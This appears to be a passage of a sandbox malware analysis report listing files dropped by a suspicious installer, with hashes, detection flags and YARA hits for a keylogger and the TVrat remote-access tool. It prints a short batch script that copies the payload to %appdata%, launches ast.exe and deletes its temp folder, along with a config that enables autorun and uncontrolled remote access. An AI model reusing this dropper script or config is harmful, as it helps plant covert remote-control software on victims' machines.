                                                                                                                                          SHA-512:B5A7F05CD721FC75B77BB33528F746E865C2277A32F3AA312A974DE903A817B7C83E7698980A496B5D04595B21926E94CF9F70A15CD0882D57BA25014BA775D6
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):172216
                                                                                                                                          Entropy (8bit):6.698242571688099
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:nGhQI/PxvCWRDvcDfo0F5HekeyO54ECV0/sMHL0WPCCb5rAg0Fujx8E0/3xt9qKv:kPxqWYF5HkyDLMsOzrAOL23VqK28j
                                                                                                                                          MD5:CF1169A87FE6266C7B457A2424DA69DA
                                                                                                                                          SHA1:5ADD67DEFD4CA56C1E9C0B239899EA699B140B64
                                                                                                                                          SHA-256:24E01FD95225E260CDD41015A70374A048568D4DF6681B3D44EAABCB1EA03EAF
                                                                                                                                          SHA-512:7BF76EB5B4E31A65931AF730909FBF848334BC98DA279E291E186FCAFDC81C76D1EF0EFEC4E00B8EAEDE6F8D130DA8B6B3D3C5DD8C14C6DCD3BCDC7D050A4B66
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):581304
                                                                                                                                          Entropy (8bit):6.580382227041057
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:bj4Q3+oAscridrDg76u3HsBTc9GtIGPi2Emvh5/kJSMl0yomcY/nRwl2Sp:bHYXSTMGtNPitm1yomJ/n+tp
                                                                                                                                          MD5:CDC5A8221738C1CA66564755BB58138C
                                                                                                                                          SHA1:EF096A2CAF133D217C202C147855F2CEE7ECD105
                                                                                                                                          SHA-256:DF5CEF85E92C6FFFAAC0ACDCE645AED3C5FA1F8FE7F9700D84CA08468AD3D5E3
                                                                                                                                          SHA-512:A9F3E256518771C1C97374E7AE3EE19EBEC0D794CD740E059DBC8289356CF1FB5D4A19F2677DB2ADBB179A73520AAEC67947DCF4C8BCD930206DE4B6CDCAD4C6
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):370488
                                                                                                                                          Entropy (8bit):6.86993159214619
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:wJ9LiOhPhz85popbbFb06wAQAwq961b/v9MkvCq2/JO+UxK6DvX0C7Uxm//f0Ps7:IBi8q5po9JkyICq2/z6DvsyEE5+PgAEX
                                                                                                                                          MD5:82E49683F540F78B2D1759CDE594482F
                                                                                                                                          SHA1:352DCBDBBB3C5C927B83389E2AB7F40B66EE716A
                                                                                                                                          SHA-256:55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576
                                                                                                                                          SHA-512:F50A3BCD5905103EEC344D7DAF1C17896DF9039D3E8D5E9BBD771F1E235EC6045D626ED838C9BF3A8F7A66AA5F41F0743EA7D9BDEF7492DA8B36561089E126BF
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):17648
                                                                                                                                          Entropy (8bit):6.317642988990049
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:ZPkFNiOMTd1th9gQIim+4vBDVU376TFNiWC:iNhMpXgIr4vBBYANi1
                                                                                                                                          MD5:ACF7048E2347CFD66CD17648DBFBAF45
                                                                                                                                          SHA1:DF5A12E399176771DC8CF2F7D0CF5548E41E2BB3
                                                                                                                                          SHA-256:F1CFFBC2ADA8491755C76360AAD14314DEB576AA65F503E52FA24DEE7D33D8E7
                                                                                                                                          SHA-512:51A53CB700FBB7ABF3BDA3101ED0885572460C1686D07C3D2125C8AA6F0834E30528BEE78CC40EE9270714A16AC769D16F5A916F37F0E48BBF7121202E58E0C0
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):465
                                                                                                                                          Entropy (8bit):4.684149132947556
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:hmR9oa39T4h+dspB929c2dceR0n1tcA2dcvNiccA2dx0HcA2d7DvDTfcA2djLvBN:w753d48daBVn17jfxmfJ8FQwH
                                                                                                                                          MD5:83B5833A435D05A04AC59744600DE4B7
                                                                                                                                          SHA1:ABE722BCC9DA288E76931962EF225EEB10BA1534
                                                                                                                                          SHA-256:B70F9730CC0796164698E9311AFBBDB95566149A7B542FE8E449F928DA239154
                                                                                                                                          SHA-512:FFA3A85AC112A622B5DC322CFF24197903B8D31D6ECAC265E02C92784693B3DFB76773545C5AB5C77FD64BF1482BEB9BC89D11392FADA662E09C0EF4099EAD8E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:
                                                                                                                                          @echo off
                                                                                                                                          set "StartDirName=template"
                                                                                                                                          set "TempDirName=u7i3kw"
                                                                                                                                          set "BatchName=9vsl3c.bat"
                                                                                                                                          set "ProcName=ast.exe"

                                                                                                                                          if exist "%appdata%\StartDirName" (
                                                                                                                                          goto end
                                                                                                                                          ) else (
                                                                                                                                          mkdir "%appdata%\%StartDirName%"
                                                                                                                                          xcopy /Y /I /S "%~dp0*" "%appdata%\%StartDirName%\"
                                                                                                                                          del /f /q "%appdata%\%StartDirName%\%BatchName%"
                                                                                                                                          start "" "%appdata%\%StartDirName%\%ProcName%"
                                                                                                                                          )
                                                                                                                                          :end
                                                                                                                                          for /d %%i in (%temp%\%TempDirName%) do rd /s /q %%i
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2098416
                                                                                                                                          Entropy (8bit):6.277915381502377
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:Vkv4EyvQ/qpyr0kAYdQqqW6qvHewDe01CPwDv3uFR0b5YrpsJ:VkvXyvQ/qpyr0kAd66oewv1CPwDv3uFI
                                                                                                                                          MD5:1AFC9BD5E625E85B696141F62FBA4325
                                                                                                                                          SHA1:56FB325125F436D7408808446D58AF50F8AA3BFC
                                                                                                                                          SHA-256:83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47
                                                                                                                                          SHA-512:02C2CF9DBC319C2AAF324175CFD3E435824439F33B4CA697324F1B8FF4331D7BDE80DE46909FC629193EF02DEB40853E295B35DC2E3B094D116B5DD783919213
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):713456
                                                                                                                                          Entropy (8bit):6.620067101616198
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:RPCS0cSUktNimb/JZqNFcbJ3bZJNlvI8CjBMUC6eVc4/SK:RPCS0c1ktNimbqYZJNlvVc4L
                                                                                                                                          MD5:96D413CAAF8C7793A96EF200F6695922
                                                                                                                                          SHA1:ABFB19A5BEA8724A08A3C709B68C65178E8EFBE5
                                                                                                                                          SHA-256:5C6E5346C4EF80E1DD211BD5519311ACA01025CE1D3811113A03E657938F370D
                                                                                                                                          SHA-512:93BF7AC89AE64948C3E91294DE89478B0F92D9CEFB71C803ABB324E181D783801C87DD6D806B0DB0D3737B3330E37993AE07B9B7D5AACCA9F9F5C3556E23EEE4
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2533560
                                                                                                                                          Entropy (8bit):6.236092740507617
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:y+PXMbxU8+hh5Mitv70n8yT1CPwDv3uFfJEkyD9:y+PwEMit0n8A1CPwDv3uFfJC
                                                                                                                                          MD5:59A3B581020759D52538425A1F5A53D5
                                                                                                                                          SHA1:4E7C528EFEF2C42119C80EFE0AA994B7AA6D2AB6
                                                                                                                                          SHA-256:4C94F00150231420A0526E9949AC9F339EB04B16BC18CB8A11C7FD98DB1235D6
                                                                                                                                          SHA-512:9D30D8167E787FD4A82444BAAA3703920EC41CBE9C684010B63564DE04E00D590C8081006C68627B8297D2715194D4B80C23B959E554D42B2770664D1ED1B79E
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):541880
                                                                                                                                          Entropy (8bit):5.766958615909
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:ghUZvMdmP9OwMJvP2jkIgEIdwKADpiw7FCPU2lvzTNl:BhMsPG2udwLdigFyU2lvzTNl
                                                                                                                                          MD5:753B75570811052953F336261E3031BB
                                                                                                                                          SHA1:2244CCE49368180C1CF6BCA0C57DAEC71401C4F7
                                                                                                                                          SHA-256:603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE
                                                                                                                                          SHA-512:6C81B813A79077E7157CF7F647A1F3C31A71098037C7003BC40B70E4AADAFCF490FDC01C71A26F8FED8C97BA33B41DF5B8A0D479DA951459CBD56421705813C5
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x272, components 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):5802
                                                                                                                                          Entropy (8bit):7.930078612894882
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:WnjHA1+9wxNAwaf886RfeyZH+5sJCf9ZN2Lzr7wnJIbp8Gj7S2ZchDqDdZyt7JlK:yVMQM1TeSJCf9Kr7wnJIbGGjtA+KJlOH
                                                                                                                                          MD5:AD245BDEA321CE2B299310DE0B7140A3
                                                                                                                                          SHA1:B98EE537F4BAA319F74BEC31D00A8F0B9621854C
                                                                                                                                          SHA-256:D2A83207A65620B133BABAE9D8E4595EB5556F4FC063CF41A552D664E0865C4B
                                                                                                                                          SHA-512:1F4D9994397D10EF3879ED5F7C1F85129E2644E0C6B243E920ED5C4623082865911B1255A577BFFAF035EB6F3E41DE6E4CD7B7D354C64F097891B965C18CBD11
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):586
                                                                                                                                          Entropy (8bit):5.203397968860563
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:L1YWzRcSbZKsNlTQ/dw/7y/x5/D++472p+fso+9hffAaJYQMhsK/qI8qP:Z7zRcSbZKKlcMypJD5KxkiaJosBq
                                                                                                                                          MD5:5D7974984AE3D593B7887CC7BDA866DD
                                                                                                                                          SHA1:9C0B2EC2659812F1E46F2D32F82E61DF223C674C
                                                                                                                                          SHA-256:7888BDB632F1BC5EB6DAE5624FE9065868D279E50ACC569D3DDE0F6DB1C95051
                                                                                                                                          SHA-512:7BDACFBCE85726A683C3A316F578A88D5991E37C8FB1E13FC4715141F5752E7FD5D145AC36730B637E26FD3198EDE2D27E86F5CF7283A0C9B08579B1056B0B70
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:[config]..Security.FixPass=4297F44B13955235245B2497399D7A93..Main.Autorun=1..Main.CloseButtonOperation=0..Main.CheckUpdates=0..Security.UseLocalSecuritySettings=1..Security.DynPassKind=0..Security.PassLifetime=0..Security.CanWinAuth=1..Security.AccessKind=1..Security.CanWinLoginAnotherUser=1..Security.UNCONTROLLED_ACCESS=1..Security.CanWinLoginNotAdmin=1..Security.DenyRemoteSettingsControl=0..Security.DenyLockControls=0..Log.ServerStoreTechLog=0..Main.AWAYMODE_REQUIRED=1..Main.LogsLifetime=1..Main.LogsForMail2Support=1..ProxySettings.UseKind=1..ProxySettings.StoreUserAndPassw=1..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1073767936
                                                                                                                                          Entropy (8bit):4.300012443222872E-4
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:
                                                                                                                                          MD5:C8AD6A4A50181E2DD95951BE4C2C54E1
                                                                                                                                          SHA1:8B7375158EE606D455295D0A34901BC05DEE0665
                                                                                                                                          SHA-256:DF6843408E914A00A2A4BF93068031E77023089E38031A3E5E99B0F420686ECA
                                                                                                                                          SHA-512:59CA02AD50E7D5FBD2DEE8295584AB643F8716ADE58352583A60EBA641012EA814D60247452D423CDB9FA05C5A79903184FFECFE615AE37DD2ACF8722E3E0952
                                                                                                                                          Malicious:true
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):970912
                                                                                                                                          Entropy (8bit):6.9649735952029515
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                          MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                          SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                          SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                          SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2236144
                                                                                                                                          Entropy (8bit):5.624149670958732
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:2HGHuX4EewGQcPryfFMoxJ+4PulW/ChEIgTS/zRUm:2HGOX4CGQtMs+WuVge/em
                                                                                                                                          MD5:BCCF6A5C2595EEA84533692BB788D8BB
                                                                                                                                          SHA1:24318226F145E52B7633A4E9E844D6EAD43B75AC
                                                                                                                                          SHA-256:ABF75DE674428E112F90F1C618218FF73EF851F4F09C5F5BA8B69E79A6C74DBF
                                                                                                                                          SHA-512:78F24F0812AAE31E83340ADEB1A1AE8C00EDFDF483E299706F863CB713BFDC2501B5418CE8F8BD9131E3C704BFFB58A8CA05C5E0A75EB19F15E0409C5B74E35B
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1724088
                                                                                                                                          Entropy (8bit):6.573221633911959
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSvSSSSSSSSSSSSSSSlwwwwwwwwwwwwwwI:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSO
                                                                                                                                          MD5:E0E559010A1CC7CB6B6F754E8833A156
                                                                                                                                          SHA1:0ADB286A1511B9D5820B042EE7D059DAEE8D0978
                                                                                                                                          SHA-256:A49D90D39BCF0FB183A8E2DFDA90E1B745565DDC25C0CC92ED7068868CB8F3E4
                                                                                                                                          SHA-512:3225A22CA8044FAFE03C005C55924B71EC2D3C9EE2325B45703EADC1F912DD867DD7FADCA0652FA2ACD46D4067575377388134E3CC58B13C0F82540224E98221
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):7543992
                                                                                                                                          Entropy (8bit):6.717610928993395
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:98304:q0f/bCIDcCkgVmZqIXrdoXj++CEKDFBaVOGizeKFUtqiAp+hRWmMLlJ7p1:X/bCIPkgVpycKDFqOLNUtqiAz
                                                                                                                                          MD5:8002D9E5851728EB024B398CF19DE390
                                                                                                                                          SHA1:9A1DC7134F3F6FCCB37DFC4DDDA35DFA2875095E
                                                                                                                                          SHA-256:B8DDE42C70D8C4A3511D5EDFFBC9F7F0C03DBDA980E29693E71344F76DA6BB0F
                                                                                                                                          SHA-512:6936B6B01F9FC2F2F69DE6AE468A9F7173239BD003AD8B7BC7336C4DD4DB50457E20EC6783B2E8A166D684A56F3F1E9FB701CA903DF3F74E3CA25C46B8A8D00E
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp, Author: Joe Security
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):33
                                                                                                                                          Entropy (8bit):4.923181998146335
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:fDzSrwCPEmi6W:rzzd6W
                                                                                                                                          MD5:E7B7A51B0FA1328CFFC285B39D7C2864
                                                                                                                                          SHA1:1785D6B29F096399A7AEC2B36A6A7E7716723053
                                                                                                                                          SHA-256:E1F0D335E3DCE44B73A9902C158ECA7C4EC9C57C2DD7DFE3D9D1279F2C4B0D77
                                                                                                                                          SHA-512:7133E09AFCABC36FC734DD0A0BC5B64FA27E0FBF7F37AF458411A6C3D0DEFF41FCE9E54C582383307538B7F5F01B16B913F0B1CAC08F0EA9F0B4E4CA6805904E
                                                                                                                                          Malicious:false
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):546816
                                                                                                                                          Entropy (8bit):6.657309146326691
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:DEnhioDz6zv6pmEmE5A8K8ZOO2rKQrbdCPAEI:Dmbz+vomEBHbZO2YCBI
                                                                                                                                          MD5:13CD45DF8AAA584EBD2A40EDE76F1E06
                                                                                                                                          SHA1:BAA19E6A965621CB315E5F866EDC179EF1D6B863
                                                                                                                                          SHA-256:3FF4E80E327F298A11E116A517BE0963A0B3CD376A6A624CAFFACD586E6B1449
                                                                                                                                          SHA-512:285D7265AC05CECDD43650E5DEF9198B5F2F4D63665739BAA059598E41F4CE892248D3CA7E793AC274DC05B4C19CFA11C17FAEA62FC1E3495C94A03851049328
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2533560
                                                                                                                                          Entropy (8bit):6.236092740507617
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:y+PXMbxU8+hh5Mitv70n8yT1CPwDv3uFfJEkyD9:y+PwEMit0n8A1CPwDv3uFfJC
                                                                                                                                          MD5:59A3B581020759D52538425A1F5A53D5
                                                                                                                                          SHA1:4E7C528EFEF2C42119C80EFE0AA994B7AA6D2AB6
                                                                                                                                          SHA-256:4C94F00150231420A0526E9949AC9F339EB04B16BC18CB8A11C7FD98DB1235D6
                                                                                                                                          SHA-512:9D30D8167E787FD4A82444BAAA3703920EC41CBE9C684010B63564DE04E00D590C8081006C68627B8297D2715194D4B80C23B959E554D42B2770664D1ED1B79E
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2098416
                                                                                                                                          Entropy (8bit):6.277915381502377
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:Vkv4EyvQ/qpyr0kAYdQqqW6qvHewDe01CPwDv3uFR0b5YrpsJ:VkvXyvQ/qpyr0kAd66oewv1CPwDv3uFI
                                                                                                                                          MD5:1AFC9BD5E625E85B696141F62FBA4325
                                                                                                                                          SHA1:56FB325125F436D7408808446D58AF50F8AA3BFC
                                                                                                                                          SHA-256:83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47
                                                                                                                                          SHA-512:02C2CF9DBC319C2AAF324175CFD3E435824439F33B4CA697324F1B8FF4331D7BDE80DE46909FC629193EF02DEB40853E295B35DC2E3B094D116B5DD783919213
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):546816
                                                                                                                                          Entropy (8bit):6.657309146326691
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:DEnhioDz6zv6pmEmE5A8K8ZOO2rKQrbdCPAEI:Dmbz+vomEBHbZO2YCBI
                                                                                                                                          MD5:13CD45DF8AAA584EBD2A40EDE76F1E06
                                                                                                                                          SHA1:BAA19E6A965621CB315E5F866EDC179EF1D6B863
                                                                                                                                          SHA-256:3FF4E80E327F298A11E116A517BE0963A0B3CD376A6A624CAFFACD586E6B1449
                                                                                                                                          SHA-512:285D7265AC05CECDD43650E5DEF9198B5F2F4D63665739BAA059598E41F4CE892248D3CA7E793AC274DC05B4C19CFA11C17FAEA62FC1E3495C94A03851049328
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1388688
                                                                                                                                          Entropy (8bit):6.85745413435775
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:vNaU+KpPikndiNfzN4jH3PlMQzMjYpOtJqTp/kqg1+:xlUfzN4jH3PlyjYpOLqd/kP1+
                                                                                                                                          MD5:3B838DC25E96877A1852966F75A5C44A
                                                                                                                                          SHA1:555E1830829B008D66FF591D87AC235F6286AB9A
                                                                                                                                          SHA-256:292C9367E5F978D2085192B85BCFEA7DF3A033172703BCCF1FF28A74D65D5AC1
                                                                                                                                          SHA-512:B5A7F05CD721FC75B77BB33528F746E865C2277A32F3AA312A974DE903A817B7C83E7698980A496B5D04595B21926E94CF9F70A15CD0882D57BA25014BA775D6
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):713456
                                                                                                                                          Entropy (8bit):6.620067101616198
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:RPCS0cSUktNimb/JZqNFcbJ3bZJNlvI8CjBMUC6eVc4/SK:RPCS0c1ktNimbqYZJNlvVc4L
                                                                                                                                          MD5:96D413CAAF8C7793A96EF200F6695922
                                                                                                                                          SHA1:ABFB19A5BEA8724A08A3C709B68C65178E8EFBE5
                                                                                                                                          SHA-256:5C6E5346C4EF80E1DD211BD5519311ACA01025CE1D3811113A03E657938F370D
                                                                                                                                          SHA-512:93BF7AC89AE64948C3E91294DE89478B0F92D9CEFB71C803ABB324E181D783801C87DD6D806B0DB0D3737B3330E37993AE07B9B7D5AACCA9F9F5C3556E23EEE4
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):541880
                                                                                                                                          Entropy (8bit):5.766958615909
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:ghUZvMdmP9OwMJvP2jkIgEIdwKADpiw7FCPU2lvzTNl:BhMsPG2udwLdigFyU2lvzTNl
                                                                                                                                          MD5:753B75570811052953F336261E3031BB
                                                                                                                                          SHA1:2244CCE49368180C1CF6BCA0C57DAEC71401C4F7
                                                                                                                                          SHA-256:603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE
                                                                                                                                          SHA-512:6C81B813A79077E7157CF7F647A1F3C31A71098037C7003BC40B70E4AADAFCF490FDC01C71A26F8FED8C97BA33B41DF5B8A0D479DA951459CBD56421705813C5
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):970912
                                                                                                                                          Entropy (8bit):6.9649735952029515
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                          MD5:034CCADC1C073E4216E9466B720F9849
